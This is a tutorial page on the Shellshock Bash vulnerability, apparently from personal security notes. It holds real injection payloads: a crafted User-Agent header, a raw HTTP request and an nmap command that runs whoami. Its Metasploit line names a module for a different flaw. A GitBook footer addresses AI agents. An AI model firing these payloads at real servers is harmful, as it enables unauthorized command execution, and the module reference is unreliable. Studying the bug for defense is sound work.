> For the complete documentation index, see [llms.txt](https://kmanu225.gitbook.io/cs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kmanu225.gitbook.io/cs/cybersecurity/vulnerabilities/rce/shellshock-cve-2014-6271.md).

# Shellshock (CVE-2014-6271)

## Description

Shellshock refers to a family of vulnerabilities in the Bash shell (dating back to version 1.3) that enable attackers to execute arbitrary commands remotely through Bash. This can lead to unauthorized remote access to the target system, often achieved via a reverse shell. The vulnerability was discovered by Stéphane Chazelas on September 12, 2014, and publicly disclosed on September 24, 2014.

Bash (Bourne Again Shell) is a \*Nix shell developed as part of the GNU project and is the default shell for most Linux distributions.

The flaw lies in Bash's handling of environment variables. Specifically, Bash incorrectly executes trailing commands following a specific sequence of characters: `() {:;};`.

The vulnerability primarily impacts Linux systems, as Windows does not use Bash (it is not a \*Nix-based operating system).

## Exploitation

Apache web servers configured to run CGI (Common Gateway Interface) scripts or `.sh` scripts are particularly vulnerable. CGI scripts are used by Apache to execute commands on the Linux system, with the output returned to the client.

To exploit Shellshock, an attacker needs to identify an input vector or script that interacts with Bash. In the case of an Apache server, legitimate CGI scripts accessible via the web server can be used. When a CGI script is executed, the server spawns a new process and runs the script with Bash, creating an opportunity for exploitation.

The vulnerability can be exploited both manually and automatically using tools like the Metasploit Framework (MSF), which includes modules specifically designed for Shellshock exploitation.

## Example

## Manual exploitation

### CGI script identification

<figure><img src="/files/XyMZQw0Jy0Xtf1Nv2FNK" alt=""><figcaption></figcaption></figure>

### Payload

We need to modify User-Agent variable and send it to the web server using the client we want.

```ruby
User-Agent: () { :;}; echo 'is vulnerable ?'
```

## Echo

```
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo 'is vulnerable'\r\nHost: target\r\nConnection: close\r\n\r\n"
```

## Nmap

```bash
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd=/usr/bin/whoami <target>
```

## Burpsuite

<figure><img src="/files/BGvHAyVsDG06UyFtFL5q" alt=""><figcaption></figcaption></figure>

## Msfconsole

The following metasploit script can also be used for exploiting shellshock vulnerability.

```ruby
use exploit/multi/http/php_cgi_arg_injection
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kmanu225.gitbook.io/cs/cybersecurity/vulnerabilities/rce/shellshock-cve-2014-6271.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.